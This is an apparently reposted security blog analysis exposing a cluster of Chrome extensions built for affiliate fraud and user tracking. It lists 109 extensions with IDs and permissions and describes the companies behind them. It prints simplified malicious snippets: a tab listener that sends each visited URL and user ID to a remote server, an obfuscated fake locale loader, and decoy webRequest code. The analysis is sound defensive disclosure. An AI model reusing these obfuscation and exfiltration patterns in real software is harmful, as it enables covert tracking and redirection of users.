Jump to content
  • Another cluster of potentially malicious Chrome extensions

    aum

    • 673 views
    • 23 minutes
     Share


    • 673 views
    • 23 minutes

    We’ve already seen Chrome extensions containing obfuscated malicious code. We’ve also seen PCVARK’s malicious ad blockers. When looking for more PCVARK extensions, I stumbled upon an inconspicuous extension called “Translator - Select to Translate.” The only unusual thing about it were its reviews, lots of raving positive reviews mixed with usability complains. That, and the permissions: why does a translator extension need webRequest and webRequestBlocking permissions?

     

    When I looked into this extension, I immediately discovered a strange code block. Supposedly, it was buggy locale processing. In reality, it turned out to be an obfuscated malicious logic meant to perform affiliate fraud.

     

    That extension wasn’t alone. I kept finding similar extensions until I had a list of 109 extensions, installed by more than 62 million users in total. While most of these extensions didn’t seem to contain malicious code (yet?), almost all of them requested excessive privileges under false pretenses. The names are often confusingly similar to established products. All of these extensions are clearly meant for dubious monetization.

     

    pdf_viewer.png

     

    If you aren’t interested in the technical details, you should probably go straight to the list of affected extensions.

     


    Contents

        Malicious code
            Adblock all advertisments
            Translator - Select to Translate
            The Great Suspender and Flash Video Downloader
        What are the other extensions up to?
            Policy violations
            Access to all websites
            The webRequest/declarativeNetRequest permission
            Remote code execution
            User tracking
            Rudimentary functionality
        The companies developing these extensions
        The affected extensions

     

    Malicious code

     

    Altogether, I found malicious functionality in four browser extensions. There might be more, but I didn’t have time to thoroughly review more than a hundred browser extensions.


    Adblock all advertisments

     

    No, I didn’t mistype the extension name. It is really named like that.

     

    When opened it up, this turned out to be the most lazy ad blocker I’ve ever seen. Its entire ad blocking functionality essentially consists of 33 hardcoded rules and a tiny YouTube content script.

     

    But wait, there is some functionality to update the rules! Except: why would someone put rule updates into a tabs.onUpdated listener? This is the code running whenever a tab finishes loading (simplified):

    let response = await fetch("https://smartadblocker.com/extension/rules/api", {
      method: "POST",
      credentials: "include",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({
        url: tab.url,
        userId: (await chrome.storage.sync.get("userId")).userId
      })
    });
    let json = await response.json();
    for (let key in json)
      
    

    Supposedly, the response is a list of rules instructing the extension to remove elements on the page by their id, class or text. In reality this website always responds with “502 Bad Gateway.”

     

    Now the website could of course be misconfigured. It’s more likely however that the website is working as intended: logging the incoming data (each address you navigate to along with your unique ID) and producing an error message to discourage anyone who comes looking.

     

    It’s not like the developers behind these extensions don’t know how to produce a (moderately) better ad blocker. My list also features an extension called “Adblock Unlimited” which, despite similar code, manages to ship more than 10,000 rules. It also manages to complement these rules with dynamically downloaded anti-malware rules without leaking your visited addresses. Oh, and it has “anti-malware protection”: a content script that will detect exclusively test pages like maliciouswebsitetest.com.

     

    Translator - Select to Translate

     

    My list features nine very similar, yet subtly different translator extensions. One of the differences in “Translator - Select to Translate” is a number of unusual functions, seemingly with the purpose of obfuscating the purpose of the code. For example, there is this gem:

    var base = e => e ? atob(e) : "parse";
    

    This function is either used with a parameter to decode Base64, or without parameters to obfuscate a JSON.parse() call. When you start looking how these weird functions are used, it all leads to the locales() function:

    function locales(callback)
    {
      chrome.runtime.getPackageDirectoryEntry(dirEntry =>
      {
        dirEntry.getDirectory("_locales", {}, dir =>
        {
          const reader = dir.createReader();
          const promises = [];
          reader.readEntries(entries =>
          {
            for (const entry of entries)
            {
              if (!entry.name.startsWith("."))
              {
                promises.push(new Promise((resolve, reject) =>
                {
                  const name = entry.name;
                  entry.getFile("../messages.json", {}, entry =>
                  {
                    entry.file(file =>
                    {
                      const fileReader = new FileReader();
                      fileReader.onloadend = () => {
                        resolve({
                          k: name,
                          v: JSON.parse(fileReader.result)
                        });
                      };
                      fileReader.readAsText(file);
                    });
                  });
                }));
              }
            }
            callback(promises);
          });
        });
      });
    }
    

    On the first glance, this looks like a legitimate function to read the locale files. Except: there is a “bug,” it reads "../messages.json" instead of "messages.json". So regardless of the locale, the file being read is _locales/messages.json.

     

    The processing of the “locales” confirms that this is not a bug but rather intentional:

    combine(locales.sort()
        .filter(locale => locale.k.charCodeAt(0) % 5 != 0)
        .map(locale => locale.v.v.message + locale.v.s.message)
        .join("")
    );
    

    Yes, calculating the modulo of the first character in the locale name isn’t something you would normally find in any legitimate locale handling code. And neither would one concatenate the messages for locale strings named v and s.

     

    When one looks at the combine() function, things only get weirder. If I got this correctly, the “locale data” is parsed by performing Base64-decoding twice and parsing the result as JSON then. And then you get code like the following (simplified here):

    var upd = data.upd;
    var c = document[upd.cret](upd.crif);
    

    From the context it’s obvious: this is calling document.createElement(). But it isn’t always possible to know for sure because the malicious messages.json file is missing from the extension. Presumably, the idea was publishing the code first and adding the malicious instructions later, in an update that wouldn’t raise suspicions.

     

    With the instructions missing, understanding the code is tricky. Many calls can be guessed by their signature however. In particular, I can see an HTML element being created to initiate a web request. Additional data is then being extracted from the HTTP headers of the response. Presumably, the actual response data is something innocuous, meant to throw anyone off track who is monitoring network traffic.

     

    After that at least two listeners are registered, presumably for webRequest.onBeforeSendHeaders and tabs.onUpdated events. While the former replaces/adds some HTTP header, the latter manipulates addresses and redirects some websites.

     

    Even before I found the other extensions I guessed that this is about affiliate fraud: when you visit a shopping website, this code redirects you so that you get to the shop with the “right” affiliate ID. The publisher of the extension earns a commission for “referring” you to the shop then. Of course, the same code could just as well redirect your banking session to a phishing website.


    The Great Suspender and Flash Video Downloader

     

    In case the name The Great Suspender sounds familiar and you are surprised to see it here: The Great Suspender used to be an open source extension, its code is still available on GitHub. Somebody took it and added some malicious code to it. Very similar code can be found in the Flash Video Downloader extension.

     

    The code in question masquerades as a license check. The “license” is being downloaded from https://www.greatsuspender.com/license_verification and https://www.flashvidownloader.com/license_verification respectively. The first time this download happens, the response will be reassuring:

    {"settings":"{default:[true]}","license":"FREE","enable":"true","time":20946}
    

    Looks fine? Well, the next download after a few hours will produce the real result:

     

    arraySettings.png

     

    Difficult to read? That’s probably because the p key of these objects is actually a position referring to a long encoded string. Let’s replace it by the strings it refers to:

     

    arraySettings_decoded.png

     

    So p is what this code looks for in a website address. If a match is found (and a number of other conditions met), you will be redirected to https://prj1<PR>.com/<R>1 where <PR> is the digit in the pr key and <R> the second value in the array stored under the r key. All the redirects happen via the domains prj11[.]com, prj12[.]com, prj13[.]com, prj14[.]com, prj15[.]com.

     

    There is also some special code for booking.com that will replace the aid parameter with a random affiliate out of a given list. If someone from Booking is reading and interested, the affiliate codes in question are: 1481387, 1491966, 1514055, 1575306, 1576925, 1582062, 230281, 230281, 230281, 7798654, 7798654, 7801354, 7805513, 7811018, 7811298, 7825986, 7825986.

     

    And now that we know which domains are being used here, it’s trivial to find user complains. For example, this Reddit thread identified The Great Suspender as the culprit two years ago. But one doesn’t have to go that far, the reviews for The Great Suspender in the Chrome Web Store are full with user complains. For example, this two years old review names the problem quite explicitly:

     

    review1.png

    Or a newer one:

     

    review2.png

    Yet the extension is still available in the Chrome Web Store.


    What are the other extensions up to?

     

    Four outright malicious extensions leaves 105 extensions without obvious malicious functionality. What are these up to? Are they harmless?

     

    I sincerely doubt that. These extensions are accumulating users with the purpose of monetizing them, likely via similarly dubious means.


    Policy violations

     

    Typically, these extensions violate at least two Chrome Web Store policies. There is a policy on spam and abuse:

     

    We don’t allow any developer, related developer accounts, or their affiliates to submit multiple extensions that provide duplicate experiences or functionality on the Chrome Web Store. Extensions should provide value to users through the creation of unique content or services.

     

    Well, 13 almost identical video downloaders, 9 almost identical volume boosters, 9 almost identical translation extensions, 5 almost identical screen recorders are definitely not providing value. What they do is making it harder to people to find proper products that solve their problem.

    There is also Chrome Web Store policy on extension permissions:

     

    Request access to the narrowest permissions necessary to implement your Product’s features or services. If more than one permission could be used to implement a feature, you must request those with the least access to data or functionality. Don’t attempt to “future proof” your Product by requesting a permission that might benefit services or features that have not yet been implemented.

     

    Almost all of these extensions do the exact opposite: request as many permissions as they can get away with.


    Access to all websites

     

    Out of the 109 extensions listed, 102 request access to all websites, often paired with the tabs privilege. This privilege level is essential in order to conduct affiliate fraud: it allows detecting when you are about to visit a particular website.

     

    These privileges also allow spying on you however, e.g. by compiling a browsing profile as we’ve seen with the ad blocking extension above. And they even allow injecting JavaScript code into the websites you visit.

     

    Almost none of these extensions need this level of access for their functionality. In most cases, permissions for a single domain or the far less problematic activeTab permission would have been sufficient. In fact, in quite a few extensions one can still see https://*.youtube.com/ or activeTab in the list of permissions, only to be followed up by <all_urls> that the developers added later for reasons unrelated to functionality.

     

    In particular, the five game extensions on my list don’t interact with websites at all. Yet all of them still request access to all websites.


    The webRequest/declarativeNetRequest permission

     

    The webRequest API and its Manifest V3 pendant declarativeNetRequest API are among the most powerful tools available to browser extensions. They allow extensions to watch all the web requests being performed by the browser. In combination with the webRequestBlocking permission, they also allow blocking any web requests or even replacing web server responses.

     

    This is the kind of functionality required to run an ad blocker, but rarely anything else. So very few extensions should be requesting these permissions. Yet 66 out of 109 extensions (61%) on my list do. For reference: when looking at extensions with similar popularity in all of Chrome Web Store, I count only 35% of them requesting these permissions.

     

    Presumably, Chrome Web Store performs automated checks to determine whether permissions are actually being used. So these extension contain code designed to fool these checks, e.g.:

    function handleResponseHeaders() {
      chrome.webRequest.onHeadersReceived.addListener(
        details => ({ responseHeaders: details.responseHeaders }),
        { urls: ["<all_urls>"] },
        [
          "blocking",
          "responseHeaders"
        ]
      );
    }
    

    This code slows down the browser by adding a listener, yet it doesn’t actually do anything. Instead of processing the headers, it merely returns them unchanged. Also popular: extracting some data, then never using it.

     

    But this is actually the good code because some of these decoys are harmful. Quite a few will remove security headers like Content-Security-Policy or X-Frame-Options, others will mess with the User-Agent or Set-Cookies headers. The damage here might not be obvious but it’s there.

    Tab Suspender extension took another approach: it incorporated some very rudimentary and error-prone tracker blocking functionality. It makes no sense in this extension, and most likely no user enables it. But it is used as justification for the webRequest permission.

     

    Other than the ad blockers, only some of the downloader extensions seem to have webRequest functionality that is actually useful. Yet even those got additional dummy calls, just in case. The honorary mention goes to the Classic 2048 extension which includes a dummy webRequest call without even requesting the webRequest permission.


    Remote code execution

     

    Normally, extensions are protected by the default Content Security Policy that allows only code contained within the extension to run. Malicious extensions often want to circumvent this security mechanism however, so that they can put the malicious code on some web server where it cannot be as easily inspected.

     

    The extensions here take an easier route and relax the Content Security Policy restrictions instead. 32 out of 109 extensions (29%) allow 'unsafe-eval' in their extension manifests. For comparison, only 9% of the similarly popular extensions in Chrome Web Store do this.

     

    I haven’t found an extension that would actually use that loophole to download and run remote JavaScript code. But maybe I simply wasn’t thorough enough.


    User tracking

     

    Almost all extensions on this list include a class which is sometimes named ExtStatTracker, more often however in a less conspicuous way. It regularly performs requests mildly masquerading as configuration downloads, except that the resulting “config” is never used.

     

    Obviously, the purpose of these requests is transmitting data about the user: which extension, which version and, most importantly, which user. Each user is assigned a unique randomly generated identifier that is sent along with all requests.

     

    There is also an “action” request performed when the extension starts up. Same data is being sent here as for the “config” download. The response might contain a url field, this page will open in a new tab then. No, I wouldn’t count on it being a welcome page.

     

    Each extension uses its own domain as tracking endpoint. This domain often doesn’t match the extension name however, either because the extension name changed too often or because the developers simply didn’t care to use a matching domain name.


    Rudimentary functionality

     

    Clearly, providing a great user experience was never the goal of these extensions. Their idea was rather making it seem like the extension is working with as little effort as possible. The better extensions appear to be based on some previous work, either open source code or an existing product that changed hands. Others have been built from scratch and barely function at all.

     

    So it’s not surprising that the review sections are filling up with complains about functional issues. Still, most of these extensions have four or more stars on average. For once, many of them are begging for reviews. Some reviewers even complain that they are required to review before using the extension.

     

    But there are also more classic fake reviews of course. These don’t even mention extension functionality but simply go on raving about how the extension changed their life.

     

    Some reviews show that at least some of the extensions used to have an entirely different purpose. For example, not all the ChatGPT extensions are new. At least one of them used to be a translation extension which got repurposed.


    The companies developing these extensions

     

    Most of these extensions are published anonymously. The developer’s email address is always some meaningless Gmail account. If there is any website content at all, it is largely meaningless as well. The privacy policy is some generic text not mentioning the developers and barely mentioning the extension at all – and then often enough with a wrong name.

     

    So I was very surprised to discover that Moment Dashboard and Infinite Dashboard extensions list a developing company in their privacy policies. These extensions are monetizing themselves via the search field on the new tab page, so maybe the developers considered this business model legal enough to mention a name.

     

    Either way, Moment Dashboard is developed by Kodice LLC based in Dubai, United Arab Emirates, and Infinite Dashboard is developed by Karbon Project LP based in London, UK. Yes, two different companies, despite these two extensions being close to identical.

     

    This seeming contradiction is resolved when you look at the management of these companies. Turns out, the CEO of Karbon Project LP moved on to be the co-founder of Kodice LLC.

     

    But that’s not all of it yet. The same person also founded Bigture, a company based in Warsaw, Poland. As it turns out, Bigture develops Dark Theme Tab extension which also made my list.

     

    And that uTab Dashboard? Developed by another London-based startup: Appolo One LTD. Coincidentally, their founder happens to be a partner at Kodice LLC. And he is also the CTO who is recruiting developers for the Hong Kong based BroCode LTD. No, not in Hongkong but for the office in Kharkiv, Ukraine (before the war).

     

    vacancy.png

    A vacancy at BroCode LTD from November 2020, looking for a JavaScript developer to “create new cool browser extensions and support/improve existing ones.”

     

    Another related extension: Clock New Tab. This one was developed by a Cyprus-based T.M.D.S. TECHNICAL MANAGEMENT LIMITED. Or maybe Bigture, depending on which Clock New Tab website you look at. Yes, the two websites are still online and have identical design. The two extensions are gone however, removed from Mozilla’s add-ons website in 2021.

     

    clocknewtab.png

     

    If all of this sounds like a money laundering scheme, then maybe that’s because it is one.

     

    Either way, these companies describe themselves as specializing in advertising and affiliate marketing. Karbon Project existed since 2011 according to their website. While their incorporation papers show being founded in 2018 by two companies based on Seychelles, there is in fact evidence that it existed prior to that.

     

    And they apparently already made a name for themselves as makers of potentially unwanted software. In addition to browser extensions, they also publish at least two web browsers. I checked the corresponding installers with VirusTotal and: surprise, they are being detected as trojans! [1] [2]

     

    Oh, and just because this hasn’t been enough fun already: these browser installers are signed by Rizzo Media LP which shares its address with Karbon Project LP in London. It has also been founded by the same two Seychelles companies.

     

    I sent an email to Karbon Project LP, Kodice LLC and Bigture asking for comment on who developed all these browser extensions. So far neither company replied.


    The affected extensions

     

    This list is certain to be incomplete. It’s mostly based on my sample of 1,670 popular Chrome extensions, not all of Chrome Web Store. User counts reflect the state for 2023-06-05.

     

    Note that only the first four of these extensions are currently malicious from what I can tell. However, they were clearly created with the intention of abusing extension privileges at some point. Note also that the extension names change frequently and only the IDs can be used to reliably identify an extension.

     

    While allowing execution of remote code (unsafe-eval) isn’t technically a permission, I listed it under permissions to simplify the presentation.

     

    Name Weekly active users Extension ID Relevant permissions
    Adblock all advertisments - No Ads extension 741,224 gbdjcgalliefpinpmggefbloehmmknca All websites
    declarativeNetRequest
    tabs
    Translator - Select to Translate 528,568 eggeoellnjnnglaibpcmggjnjifeebpi All websites
    webRequest
    notifications
    Flash Video Downloader 240,450 ionpbgeeliajehajombdeflogfpgmmel All websites
    downloads
    tabs
    webRequest
    unsafe-eval
    The Great Suspender 174,646 jaekigmcljkkalnicnjoafgfjoefkpeg All websites
    history
    tabs
    Floating Video - Picture in Picture mode 102,486 aeilijiaejfdnbagnpannhdoaljpkbhe All websites
    webRequest
    Sidebarr - chatgpt, bookmarks, apps and more 162,384 afdfpkhbdpioonfeknablodaejkklbdn All websites
    bookmarks
    tabs
    webRequest
    Cute Cursors - Custom Cursor for Chrome™ 1,022,641 anflghppebdhjipndogapfagemgnlblh All websites
    tabs
    Volume Booster 4,536,673 anmbbeeiaollmpadookgoakpfjkbidaf All websites
    tabs
    tabCapture
    webRequest
    Translator Pro - Quick Translate 486,062 bebmphofpgkhclocdbgomhnjcpelbenh All websites
    tabs
    webRequest
    unsafe-eval
    Screen Capture, Screenshot, Annotations 568,357 bmkgbgkneealfabgnjfeljaiegpginpl All websites
    webRequest
    unsafe-eval
    Sound Booster & Volume Control 2,341,097 ccjlpblmgkncnnimcmbanbnhbggdpkie All websites
    tabCapture
    webRequest
    Paint Online 171,048 cclhgechkjghfaoebihpklmllnnlnbdb All websites
    webRequest
    unsafe-eval
    Sidegram | Web Client for Instagram™ 282,701 cfegchignldpfnjpodhcklmgleaoanhi All websites
    cookies
    downloads
    tabs
    webRequest
    Roblox with extras! - RoBox 362,890 cfllfglbkmnbkcibbjoghimalbileaic All websites
    notifications
    webRequest
    Video Downloader Plus 785,815 cjljdgfhkjbdbkcdkfojleidpldagmao All websites
    downloads
    tabs
    webRequest
    Paint Tool for Chrome 213,277 coabfkgengacobjpmdlmmihhhfnhbjdm All websites
    Free privacy connection - VPN Guru 529,711 dcaffjpclkkjfacgfofgpjbmgjnjlpmh All websites
    proxy
    webRequest
    Screenshot Master and Screen Recorder 717,617 djekgpcemgcnfkjldcclcpcjhemofcib All websites
    desktopCapture
    downloads
    identity
    tabCapture
    tabs
    unsafe-eval
    Video Downloader Plus 850,811 dkbccihpiccbcheieabdbjikohfdfaje All websites
    downloads
    tabs
    webRequest
    Night Shift Mode 194,983 dlpimjmonhbmamocpboifndnnakgknbf All websites
    tabs
    Music Downloader - VKsaver 278,761 dmbjkidogjmmlejdmnecpmfapdmidfjg All websites
    webRequest
    unsafe-eval
    Web Color Picker - online color grabber 346,145 dneifdhdmnmmlobjbimlkcnhkbidmlek All websites
    notifications
    webRequest
    Free Paint Online - Draw on any website 298,489 doiiaejbgndnnnomcdhefcbfnbbjfbib All websites
    webRequest
    unsafe-eval
    Block Site: Site Blocker & Focus Mode 450,216 dpfofggmkhdbfcciajfdphofclabnogo All websites
    notifications
    tabs
    Classic 2048 online game 255,101 eabhkjojehdleajkbigffmpnaelncapp All websites
    Gmail Notifier - gmail notification tool 128,201 ealojglnbikknifbgleaceopepceakfn All websites
    notifications
    tabs
    webRequest
    Audio Capture - Sound Recorder 429,608 ebdbcfomjliacpblnioignhfhjeajpch All websites
    downloads
    tabCapture
    Screenshot Tool - Screen Capture & Editor 784,002 edlifbnjlicfpckhgjhflgkeeibhhcii All websites
    unsafe-eval
    New Tab with chatgpt for Chrome 163,289 ehmneimbopigfgchjglgngamiccjkijh All websites
    tabs
    New Tab for Google Workspace™ 177,701 ehpgcagmhpndkmglombjndkdmggkgnge bookmarks
    history
    management
    topSites
    paint 230,984 ejllkedmklophclpgonojjkaliafeilj All websites
    tabs
    webRequest
    unsafe-eval
    Online messengers in All-in-One chat 284,493 ekjogkoigkhbgdgpolejnjfmhdcgaoof All websites
    tabs
    webRequest
    Video Downloader Ultimate 654,295 elpdbicokgbedckgblmbhoamophfbchi All websites
    downloads
    webRequest
    unsafe-eval
    Web Paint 499,229 emeokgokialpjadjaoeiplmnkjoaegng All websites
    webRequest
    unsafe-eval
    Color picker tool - geco 821,616 eokjikchkppnkdipbiggnmlkahcdkikp All websites
    notifications
    webRequest
    VPN Unlimited - Best VPN by unblock 302,077 epeigjgefhajkiiallmfblgglmdbhfab All websites
    proxy
    webRequest
    Flash Player Enabler 314,400 eplfglplnlljjpeiccbgnijecmkeimed All websites
    notifications
    ChatGPT Plus for Google 660,571 fbbjijdngocdplimineplmdllhjkaece All websites
    webRequest
    Volume Booster - Sound Master pro 1,056,902 fbjhgeaafhlbjiejehpjdnghinlcceak All websites
    tabCapture
    webRequest
    Video Downloader for Chrome 432,088 fedchalbmgfhdobblebblldiblbmpgdj All websites
    downloads
    webRequest
    unsafe-eval
    InSaverify | Web for Instagram™ 723,983 fobaamfiblkoobhjpiigemmdegbmpohd All websites
    downloads
    webRequest
    Video Speed Controller - video manager 571,724 gaiceihehajjahakcglkhmdbbdclbnlf None
    Sound Equalizer with Volume Booster 160,716 gceehiicnbpehbbdaloolaanlnddailm All websites
    tabCapture
    unsafe-eval
    How to Take Screenshot 718,442 ggacghlcchiiejclfdajbpkbjfgjhfol All websites
    notifications
    Dark Theme - Night Shift Mode 741,084 gjjbmfigjpgnehjioicaalopaikcnheo All websites
    tabs
    Quick Translate: Reading & writing translator 145,527 gpdfpljioapjogbnlpmganakfjcemifk All websites
    declarativeNetRequest
    tabs
    HD Video Downloader 783,475 hjlekdknhjogancdagnndeenmobeofgm All websites
    downloads
    webRequest
    Picture in Picture - Floating Player 790,847 hlbdhflagoegglpdminhlpenkdgloabe All websites
    webRequest
    Translator - Web translate, Dictionary 143,032 hnfabcchmopgohnhkcojhocneefbnffg All websites
    unsafe-eval
    2048 Game 579,610 iabflonngmpkalkpbjonemaamlgdghea All websites
    webRequest
    Select to translate - Translator, Dictionary 834,660 ibppednjgooiepmkgdcoppnmbhmieefh All websites
    tabs
    webRequest
    Simple Translate: Select to Translate 148,542 icchadngbpkcegnabnabhkjkfkfflmpj All websites
    declarativeNetRequest
    tabs
    Quick Translator - Translate, Dictionary 289,479 ielooaepfhfcnmihgnabkldnpddnnldl All websites
    webRequest
    BlockSite: Free Site Blocker & Focus Mode 447,353 ifdepgnnjpnbkcgempionjablajancjc All websites
    notifications
    tabs
    unsafe-eval
    Scrnli Screen Recorder & Screen Capture App 1,391,249 ijejnggjjphlenbhmjhhgcdpehhacaal All websites
    desktopCapture
    tabCapture
    unsafe-eval
    Web Paint Tool - draw online 540,374 iklgljbighkgbjoecoddejooldolenbj All websites
    webRequest
    unsafe-eval
    Free Screen Recorder for Chrome 1,397,721 imopknpgdihifjkjpmjaagcagkefddnb All websites
    desktopCapture
    downloads
    identity
    tabCapture
    unsafe-eval
    Sound Booster & Pro equalizer- Audio Master 908,736 jchmabokofdoabocpiicjljelmackhho All websites
    tabCapture
    tabs
    webRequest
    PDF Viewer 159,253 jdlkkmamiaikhfampledjnhhkbeifokk All websites
    webRequest
    Video Downloader Online 659,516 jglemppahimembneahjbkhjknnefeeio All websites
    downloads
    tabs
    webRequest
    Adblock Unlimited - ad blocker 633,692 jiaopkfkampgnnkckajcbdgannoipcne All websites
    declarativeNetRequest
    Audio Capture - Volume Recorder 282,691 jjgnkfncaadmaobenjjpmngdpgalemho All websites
    downloads
    tabCapture
    webRequest
    ChatGPT for Search - Support GPT-4 709,522 jlbpahgopcmomkgegpbmopfodolajhbl None
    Adblock for YouTube™ 477,901 jpefmbpcbebpjpmelobfakahfdcgcmkl All websites
    tabs
    unsafe-eval
    Chatgpt lite - OpenAI 452,660 khdnaopfklkdcloiinccnaflffmfcioa All websites
    webRequest
    Doodle games 172,823 kjgkmceledmpdnmgmppiekdbnamccdjp All websites
    webRequest
    Tab Suspender 144,708 laameccjpleogmfhilmffpdbiibgbekf All websites
    tabs
    webRequest
    unsafe-eval
    Adblock for Youtube - ad blocker tool 504,747 lagdcjmbchphhndlbpfajelapcodekll All websites
    tabs
    Image Downloader - Save photos and pictures 1,108,637 lbohagbplppjcpllnhdichjldhfgkicb All websites
    downloads
    webRequest
    Video Downloader Wise 334,204 ledkggjjapdgojgihnaploncccgiadhg All websites
    cookies
    downloads
    tabs
    webRequest
    unsafe-eval
    Moment - #1 Personal Dashboard for Chrome 145,695 lgecddhfcfhlmllljooldkbbijdcnlpe topSites
    unsafe-eval
    Skip Ad - Ad Block & Auto Ad Skip on YouTube 737,164 lkahpjghmdhpiojknppmlenngmpkkfma All websites
    webRequest
    Wowsearch 9,871 lkciiknpgglgbbcgcpbpobjabglmpkle webRequest
    unsafe-eval
    Flash Player for Web 838,775 lkhhagecaghfakddbncibijbjmgfhfdm All websites
    notifications
    Web client for Instagram™ 147,377 lknpbgnookklokdjomiildnlalffjmma All websites
    downloads
    webRequest
    Web translator, dictionary - simple translate 797,018 lojpdfjjionbhgplcangflkalmiadhfi All websites
    webRequest
    unsafe-eval
    Video downloader - download any video for free 451,102 mdkiofbiinbmlblcfhfjgmclhdfikkpm All websites
    downloads
    webRequest
    unsafe-eval
    Infinite Dashboard - New Tab like no other 233,688 meffljleomgifbbcffejnmhjagncfpbd All websites
    tabs
    topSites
    unsafe-eval
    ChatGPT Assistant for Chrome | SidebarGPT 301,246 mejjgaogggabifjfjdbnobinfibaamla All websites
    tabs
    Good Video Downloader 394,903 mhpcabliilgadobjpkameggapnpeppdg All websites
    downloads
    webRequest
    unsafe-eval
    Video Downloader Unlimited 716,091 mkjjckchdfhjbpckippbnipkdnlidbeb All websites
    downloads
    webRequest
    Video Downloader by 1qvid 986,983 mldaiedoebimcgkokmknonjefkionldi All websites
    downloads
    webRequest
    Chatgpt friend 565,345 mlkjjjmhjijlmafgjlpkiobpdocdbncj webRequest
    Picture-in-Picture - floating video 794,535 mndiaaeaiclnmjcnacogaacoejchdclp All websites
    unsafe-eval
    Translator uLanguage - Translate, Dictionary 709,192 mnlohknjofogcljbcknkakphddjpijak All websites
    tabs
    VPN Surf - Fast VPN by unblock 443,066 nhnfcgpcbfclhfafjlooihdfghaeinfc All websites
    proxy
    webRequest
    ChatGPT for Chrome - search GPT 1,057,279 ninecedhhpccjifamhafbdelibdjibgd None
    Sound Booster - increase volume up 752,471 nmigaijibiabddkkmjhlehchpmgbokfj All websites
    tabCapture
    tabs
    Text Reader (Text to Speech) TTS by Read me 312,121 npdkkcjlmhcnnaoobfdjndibfkkhhdfn All websites
    webRequest
    uTab - Unlimited Custom Dashboard 234,918 npmjjkphdlmbeidbdbfefgedondknlaf All websites
    bookmarks
    Flash Player Update 497,248 oakbcaafbicdddpdlhbchhpblmhefngh All websites
    unsafe-eval
    Web paint tool by Painty 432,129 obdhcplpbliifflekgclobogbdliddjd All websites
    tabs
    topSites
    Night Shift 213,620 ocginjipilabheemhfbedijlhajbcabh All websites
    Editing for Docs, Sheets & Slides 167,677 oepjogknopbbibcjcojmedaepolkghpb All websites
    webRequest
    unsafe-eval
    Accept all cookies 292,192 ofpnikijgfhlmmjlpkfaifhhdonchhoi All websites
    webRequest
    VolumeUp - Sound booster 731,585 ogadflejmplcdhcldlloonbiekhnlopp All websites
    tabCapture
    tabs
    The cleaner - delete cookies and cache 133,968 ogfjgagnmkiigilnoiabkbbajinanlbn All websites
    cookies
    tabs
    webRequest
    Screenshot & Screen Recorder 288,528 okkffdhbfplmbjblhgapnchjinanmnij All websites
    downloads
    tabCapture
    tabs
    webRequest
    All Doodle games 134,820 oodkhhminilgphkdofffddlgopkgbgpm All websites
    Super Mario Bros Game 163,597 pegfdldddiilihjahcpdehhhfcbibipg All websites
    declarativeNetRequest
    Custom Cursor for Chrome 785,639 phfkifnjcmdcmljnnablahicoabkokbg All websites
    tabs
    Text mode for websites - Readbee 451,865 phjbepamfhjgjdgmbhmfflhnlohldchb All websites
    Dark Mode - Dark Reader for Сhrome 4,557,935 pjbgfifennfhnbkhoidkdchbflppjncb All websites
    tabs
    webRequest
    Sound Booster - Boost My Bass 124,554 plmlopfeeobajiecodiggabcihohcnge All websites
    tabCapture
    tabs
    Sound Booster 144,170 pmilcmjbofinpnbnpanpdadijibcgifc All websites
    tabCapture
    tabs
    Screen Capture - Screenshot Tool 748,022 pmnphobdokkajkpbkajlaiooipfcpgio All websites
    downloads
    tabs
    unsafe-eval
    Picture-in-Picture - floating video 706,151 pnanegnllonoiklmmlegcaajoicfifcm All websites
    tabs
    unsafe-eval
    Save quickly and repost 918,667 pnlphjjfielecalmmjjdhjjninkbjdod All websites
    cookies
    downloads
    tabs
    webRequest
    History & Cache Cleaner - Smart Clean 277,722 pooaemmkohlphkekccfajnbcokjlbehk All websites
    cookies
    tabs
    webRequest

     

    Source

    • Like 2

    User Feedback

    Recommended Comments

    There are no comments to display.



    Join the conversation

    You can post now and register later. If you have an account, sign in now to post with your account.
    Note: Your post will require moderator approval before it will be visible.

    Guest
    Add a comment...

    ×   Pasted as rich text.   Paste as plain text instead

      Only 75 emoji are allowed.

    ×   Your link has been automatically embedded.   Display as a link instead

    ×   Your previous content has been restored.   Clear editor

    ×   You cannot paste images directly. Upload or insert images from URL.


  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...